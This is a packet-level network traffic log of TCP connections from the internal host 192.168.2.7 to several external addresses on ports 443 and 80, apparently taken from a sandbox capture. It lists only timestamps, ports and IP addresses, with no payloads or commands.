Nov 2, 2024 17:56:53.749936104 CET	443	49947	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:53.750616074 CET	49947	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:53.750621080 CET	443	49947	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:53.814270973 CET	443	49952	23.198.7.184	192.168.2.7
Nov 2, 2024 17:56:53.814500093 CET	49952	443	192.168.2.7	23.198.7.184
Nov 2, 2024 17:56:53.814517975 CET	443	49952	23.198.7.184	192.168.2.7
Nov 2, 2024 17:56:53.815536022 CET	443	49952	23.198.7.184	192.168.2.7
Nov 2, 2024 17:56:53.815607071 CET	49952	443	192.168.2.7	23.198.7.184
Nov 2, 2024 17:56:53.816730976 CET	49952	443	192.168.2.7	23.198.7.184
Nov 2, 2024 17:56:53.816807985 CET	443	49952	23.198.7.184	192.168.2.7
Nov 2, 2024 17:56:53.824867964 CET	443	49951	23.198.7.184	192.168.2.7
Nov 2, 2024 17:56:53.825093031 CET	49951	443	192.168.2.7	23.198.7.184
Nov 2, 2024 17:56:53.825114965 CET	443	49951	23.198.7.184	192.168.2.7
Nov 2, 2024 17:56:53.827001095 CET	443	49951	23.198.7.184	192.168.2.7
Nov 2, 2024 17:56:53.827059984 CET	49951	443	192.168.2.7	23.198.7.184
Nov 2, 2024 17:56:53.827537060 CET	49951	443	192.168.2.7	23.198.7.184
Nov 2, 2024 17:56:53.827619076 CET	443	49951	23.198.7.184	192.168.2.7
Nov 2, 2024 17:56:53.859741926 CET	49952	443	192.168.2.7	23.198.7.184
Nov 2, 2024 17:56:53.859765053 CET	443	49952	23.198.7.184	192.168.2.7
Nov 2, 2024 17:56:53.868776083 CET	49951	443	192.168.2.7	23.198.7.184
Nov 2, 2024 17:56:53.868803024 CET	443	49951	23.198.7.184	192.168.2.7
Nov 2, 2024 17:56:53.870861053 CET	49959	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:53.870904922 CET	443	49959	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:53.870975018 CET	49959	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:53.871207952 CET	49959	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:53.871229887 CET	443	49959	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:53.873434067 CET	443	49948	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:53.874022961 CET	49948	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:53.874043941 CET	443	49948	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:53.874499083 CET	49948	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:53.874504089 CET	443	49948	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:53.881448030 CET	443	49947	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:53.881545067 CET	443	49947	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:53.881597996 CET	49947	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:53.881732941 CET	49947	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:53.881757021 CET	443	49947	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:53.881771088 CET	49947	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:53.881778002 CET	443	49947	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:53.884936094 CET	49960	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:53.884974957 CET	443	49960	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:53.885066986 CET	49960	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:53.885601997 CET	49961	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:53.885648966 CET	443	49961	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:53.885791063 CET	49961	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:53.886080027 CET	49961	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:53.886099100 CET	443	49961	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:53.886168003 CET	49960	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:53.886179924 CET	443	49960	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:53.905895948 CET	49952	443	192.168.2.7	23.198.7.184
Nov 2, 2024 17:56:53.917409897 CET	443	49949	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:53.917958021 CET	49949	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:53.917983055 CET	443	49949	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:53.918385029 CET	49949	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:53.918390989 CET	443	49949	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:53.920907974 CET	49951	443	192.168.2.7	23.198.7.184
Nov 2, 2024 17:56:53.924195051 CET	443	49950	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:53.924632072 CET	49950	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:53.924652100 CET	443	49950	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:53.925070047 CET	49950	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:53.925074100 CET	443	49950	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:53.958436966 CET	443	49954	204.79.197.219	192.168.2.7
Nov 2, 2024 17:56:53.960475922 CET	443	49953	204.79.197.219	192.168.2.7
Nov 2, 2024 17:56:53.961282015 CET	49953	443	192.168.2.7	204.79.197.219
Nov 2, 2024 17:56:53.961335897 CET	443	49953	204.79.197.219	192.168.2.7
Nov 2, 2024 17:56:53.961872101 CET	49954	443	192.168.2.7	204.79.197.219
Nov 2, 2024 17:56:53.961889029 CET	443	49954	204.79.197.219	192.168.2.7
Nov 2, 2024 17:56:53.962354898 CET	443	49953	204.79.197.219	192.168.2.7
Nov 2, 2024 17:56:53.962424040 CET	49953	443	192.168.2.7	204.79.197.219
Nov 2, 2024 17:56:53.962979078 CET	443	49954	204.79.197.219	192.168.2.7
Nov 2, 2024 17:56:53.963047028 CET	49954	443	192.168.2.7	204.79.197.219
Nov 2, 2024 17:56:53.963855028 CET	49953	443	192.168.2.7	204.79.197.219
Nov 2, 2024 17:56:53.963926077 CET	443	49953	204.79.197.219	192.168.2.7
Nov 2, 2024 17:56:53.964343071 CET	49954	443	192.168.2.7	204.79.197.219
Nov 2, 2024 17:56:53.964413881 CET	443	49954	204.79.197.219	192.168.2.7
Nov 2, 2024 17:56:53.975529909 CET	443	49955	23.198.7.174	192.168.2.7
Nov 2, 2024 17:56:53.975734949 CET	49955	443	192.168.2.7	23.198.7.174
Nov 2, 2024 17:56:53.975744963 CET	443	49955	23.198.7.174	192.168.2.7
Nov 2, 2024 17:56:53.976823092 CET	443	49955	23.198.7.174	192.168.2.7
Nov 2, 2024 17:56:53.976898909 CET	49955	443	192.168.2.7	23.198.7.174
Nov 2, 2024 17:56:53.977839947 CET	49955	443	192.168.2.7	23.198.7.174
Nov 2, 2024 17:56:53.977900028 CET	443	49955	23.198.7.174	192.168.2.7
Nov 2, 2024 17:56:53.978347063 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:53.983163118 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.002608061 CET	443	49948	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:54.003015995 CET	443	49948	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:54.003057957 CET	443	49948	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:54.003072977 CET	49948	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:54.003118038 CET	49948	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:54.003166914 CET	49948	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:54.003179073 CET	443	49948	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:54.003206015 CET	49948	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:54.003221035 CET	443	49948	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:54.005441904 CET	49962	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:54.005465031 CET	443	49962	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:54.005641937 CET	49962	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:54.005790949 CET	49962	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:54.005801916 CET	443	49962	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:54.015620947 CET	49954	443	192.168.2.7	204.79.197.219
Nov 2, 2024 17:56:54.015625000 CET	49953	443	192.168.2.7	204.79.197.219
Nov 2, 2024 17:56:54.015635967 CET	443	49954	204.79.197.219	192.168.2.7
Nov 2, 2024 17:56:54.015645027 CET	443	49953	204.79.197.219	192.168.2.7
Nov 2, 2024 17:56:54.030455112 CET	49955	443	192.168.2.7	23.198.7.174
Nov 2, 2024 17:56:54.030467987 CET	443	49955	23.198.7.174	192.168.2.7
Nov 2, 2024 17:56:54.034562111 CET	49963	443	192.168.2.7	20.125.209.212
Nov 2, 2024 17:56:54.034619093 CET	443	49963	20.125.209.212	192.168.2.7
Nov 2, 2024 17:56:54.034804106 CET	49963	443	192.168.2.7	20.125.209.212
Nov 2, 2024 17:56:54.035068035 CET	49963	443	192.168.2.7	20.125.209.212
Nov 2, 2024 17:56:54.035084009 CET	443	49963	20.125.209.212	192.168.2.7
Nov 2, 2024 17:56:54.052870035 CET	443	49949	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:54.052932024 CET	443	49949	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:54.053145885 CET	49949	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:54.053181887 CET	49949	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:54.053181887 CET	49949	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:54.053205013 CET	443	49949	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:54.053215981 CET	443	49949	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:54.055834055 CET	49964	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:54.055856943 CET	443	49964	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:54.055921078 CET	49964	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:54.056062937 CET	49964	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:54.056071997 CET	443	49964	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:54.057822943 CET	49965	443	192.168.2.7	18.245.124.39
Nov 2, 2024 17:56:54.057876110 CET	443	49965	18.245.124.39	192.168.2.7
Nov 2, 2024 17:56:54.057990074 CET	49965	443	192.168.2.7	18.245.124.39
Nov 2, 2024 17:56:54.058195114 CET	49965	443	192.168.2.7	18.245.124.39
Nov 2, 2024 17:56:54.058206081 CET	443	49965	18.245.124.39	192.168.2.7
Nov 2, 2024 17:56:54.060019016 CET	443	49950	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:54.060045004 CET	443	49950	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:54.060084105 CET	443	49950	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:54.060116053 CET	49950	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:54.060151100 CET	49950	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:54.060314894 CET	49950	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:54.060321093 CET	443	49950	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:54.060332060 CET	49950	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:54.060334921 CET	443	49950	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:54.062155962 CET	49954	443	192.168.2.7	204.79.197.219
Nov 2, 2024 17:56:54.062155008 CET	49953	443	192.168.2.7	204.79.197.219
Nov 2, 2024 17:56:54.062994003 CET	49966	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:54.063004017 CET	443	49966	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:54.063590050 CET	49966	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:54.063786030 CET	49966	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:54.063791037 CET	443	49966	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:54.077296972 CET	49955	443	192.168.2.7	23.198.7.174
Nov 2, 2024 17:56:54.091130018 CET	443	49956	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:54.091568947 CET	49956	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:54.091588974 CET	443	49956	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:54.092114925 CET	49956	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:54.092123032 CET	443	49956	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:54.223428011 CET	443	49956	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:54.223592997 CET	443	49956	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:54.223748922 CET	49956	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:54.223978043 CET	49956	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:54.223993063 CET	443	49956	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:54.224003077 CET	49956	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:54.224008083 CET	443	49956	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:54.227535963 CET	49967	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:54.227583885 CET	443	49967	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:54.227714062 CET	49967	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:54.228332996 CET	49967	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:54.228348970 CET	443	49967	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:54.247462988 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.247483015 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.247493029 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.247617006 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:54.247617006 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:54.247634888 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.247648001 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.247659922 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.247673035 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.247729063 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:54.247755051 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.247760057 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:54.247797966 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:54.248286963 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.248333931 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.248342037 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:54.248439074 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:54.250489950 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.250509024 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.250550985 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:54.358923912 CET	443	49958	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:54.359775066 CET	49958	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:54.359786987 CET	443	49958	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:54.360138893 CET	443	49958	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:54.361099005 CET	49958	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:54.361171007 CET	443	49958	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:54.361262083 CET	49958	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:54.389735937 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.389784098 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.389796972 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.389825106 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:54.389851093 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:54.389873981 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:54.390044928 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.390105009 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.390116930 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.390158892 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:54.390408039 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.390463114 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.390475035 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.390506029 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:54.390521049 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.390537977 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:54.390556097 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:54.391189098 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.391254902 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:54.391264915 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.391278028 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.391338110 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:54.391352892 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.391396046 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:54.392024994 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.392038107 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.392050028 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.392086983 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:54.392101049 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:54.392142057 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.392189026 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:54.392793894 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.392860889 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.392874002 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.392913103 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:54.392932892 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:54.392954111 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.392992973 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:54.393678904 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.393748045 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:54.393752098 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.393841028 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:54.394670963 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.394690990 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.394731998 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:54.394762993 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:54.403331995 CET	443	49958	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:54.412560940 CET	49958	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:54.455482006 CET	49968	443	192.168.2.7	23.198.7.174
Nov 2, 2024 17:56:54.455513954 CET	443	49968	23.198.7.174	192.168.2.7
Nov 2, 2024 17:56:54.455780983 CET	49968	443	192.168.2.7	23.198.7.174
Nov 2, 2024 17:56:54.456032038 CET	49968	443	192.168.2.7	23.198.7.174
Nov 2, 2024 17:56:54.456043005 CET	443	49968	23.198.7.174	192.168.2.7
Nov 2, 2024 17:56:54.499437094 CET	443	49959	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:54.499694109 CET	49959	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:54.499712944 CET	443	49959	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:54.500056982 CET	443	49959	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:54.502253056 CET	49959	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:54.502324104 CET	443	49959	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:54.502475977 CET	49959	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:54.523732901 CET	443	49961	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:54.524029970 CET	49961	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:54.524060011 CET	443	49961	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:54.525099993 CET	443	49961	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:54.525218010 CET	49961	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:54.525556087 CET	49961	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:54.525620937 CET	443	49961	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:54.525830984 CET	49961	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:54.525840998 CET	443	49961	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:54.532810926 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.532879114 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.532891989 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.532931089 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.532939911 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:54.532963991 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:54.532978058 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.533004999 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.533021927 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:54.533046961 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:54.533152103 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.533199072 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.533216953 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.533226967 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:54.533241034 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:54.533247948 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.533269882 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:54.533287048 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:54.533379078 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.533392906 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.533430099 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:54.533442974 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.533454895 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.533467054 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.533504009 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:54.533657074 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.533669949 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.533682108 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.533693075 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.533704996 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.533714056 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:54.533720016 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.533734083 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:54.533745050 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:54.533772945 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:54.534069061 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.534116983 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.534130096 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.534169912 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:54.534250021 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.534261942 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.534275055 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.534320116 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:54.543349981 CET	443	49959	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:54.567785978 CET	49961	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:54.611658096 CET	443	49958	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:54.611680984 CET	443	49958	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:54.611690998 CET	443	49958	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:54.611716032 CET	443	49958	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:54.611727953 CET	443	49958	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:54.611740112 CET	443	49958	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:54.611754894 CET	49958	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:54.611769915 CET	443	49958	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:54.611804008 CET	49958	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:54.611820936 CET	49958	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:54.612674952 CET	443	49957	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:54.613805056 CET	49957	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:54.613818884 CET	443	49957	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:54.614830971 CET	49957	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:54.614839077 CET	443	49957	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:54.614927053 CET	49957	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:54.614938021 CET	443	49957	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:54.618331909 CET	443	49958	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:54.618347883 CET	443	49958	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:54.618396997 CET	49958	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:54.618406057 CET	443	49958	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:54.618431091 CET	49958	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:54.618449926 CET	49958	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:54.619153023 CET	443	49958	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:54.619287968 CET	49958	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:54.631359100 CET	443	49960	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:54.634257078 CET	49960	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:54.634279013 CET	443	49960	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:54.635003090 CET	49960	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:54.635009050 CET	443	49960	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:54.652040005 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.652103901 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.652117014 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.652126074 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:54.652144909 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:54.652172089 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:54.652236938 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.652251005 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:54.652282000 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:54.652307034 CET	49933	80	192.168.2.7	62.204.41.163
